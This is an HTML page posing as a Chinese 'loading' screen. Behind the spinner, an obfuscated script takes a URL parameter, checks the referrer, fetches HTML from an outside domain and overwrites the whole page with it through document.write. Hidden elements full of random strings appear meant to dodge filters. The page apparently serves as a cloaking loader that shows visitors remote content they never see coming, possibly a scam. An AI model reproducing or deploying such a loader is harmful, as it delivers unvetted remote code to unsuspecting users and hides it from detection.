<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .shxrXwc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .shxrXwc .s1oMm9fNT0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .shxrXwc .content {
            line-height: 50px;
            text-align: center
        }

        .shxrXwc .img {
            width: 100%
        }

        .shxrXwc .r0Irh7 {
            text-align: center
        }

        .shxrXwc .r0Irh7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .shxrXwc .r0Irh7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .shxrXwc .r0Irh7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .shxrXwc .r0Irh7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .shxrXwc .r0Irh7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .shxrXwc .r0Irh7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .shxrXwc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TIMByVzKpbr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rjcS0pD = TIMByVzKpbr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rjcS0pD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rjcS0pD +".html?a=share";
		}
		
        OunO0ZOA=url+"#"+new Date().getTime();
        OunO0ZOA && function() {
            $.get(OunO0ZOA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >BYbzWGm6WKW9T8RjeuWPEaT3MPIftCTZunezFRPSHwtaLs9fkJAdjqvkZoOCdRnlMlnOpn8DCMMScRGRohWXboEegbcZ</b>
<a  href='#' style='display:none'>K1XLwRGxHU6bM2BkClsUxEfUNGyTlw7yz1SPI0bkJMO62xcqZY1xwT2Gp2UJAQvCV2lm5mK6x5L1GUfsXU4IcLgr84w08</a>
<ul style='display:none' >HKBNER58nI9yJfXaIsagCfX9w1rYGoJLXuka30kfLWuvJHCtzw6KEp</ul>
<a  href='#' style='display:none'>K1XLwRGxHU6bM2BkClsUxEfUNGyTlw7yz1SPI0bkJMO62xcqZY1xwT2Gp2UJAQvCV2lm5mK6x5L1GUfsXU4IcLgr84w08</a>
<div style='display:none'>B8AEyMepKx1YUTXKJOQ12XXHVWBGpXDyzCxgAQKNdKF2x3QRtSBgigmihaycFj8YMFQPkj5IBCTGmnoOQEowmd51HNqEpu</div>
<p  style='display:none'>TmfxgCzffmw1j9O87qxSIt9fIVolqRi11lEZqepPDZcHComQ5VNquLvSnNvHhvQjOA6Qb1A3P34E85TdbDb1FwR</p>
<ul style='display:none' >HKBNER58nI9yJfXaIsagCfX9w1rYGoJLXuka30kfLWuvJHCtzw6KEp</ul>
<img  src='' style='display:none'>
<div style='display:none'>B8AEyMepKx1YUTXKJOQ12XXHVWBGpXDyzCxgAQKNdKF2x3QRtSBgigmihaycFj8YMFQPkj5IBCTGmnoOQEowmd51HNqEpu</div><div class="shxrXwc">
    <div class="s1oMm9fNT0">
        <div class="r0Irh7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>chL5nKCoHljnEym2iLc9qKfTOfX0Z6g9E3JSQJ1sknmBtpEcRmMfucmxPUBIIJvqS0j1rD7d</p>
<h1 style='display:none' >Bh3kLvfEZdEtUIyWbOPHBQLvsH8XaVjgAR</h1>
<span style='display:none'>AmPMbIV5x8iyQAKMY6FtLC</span></body>
</html>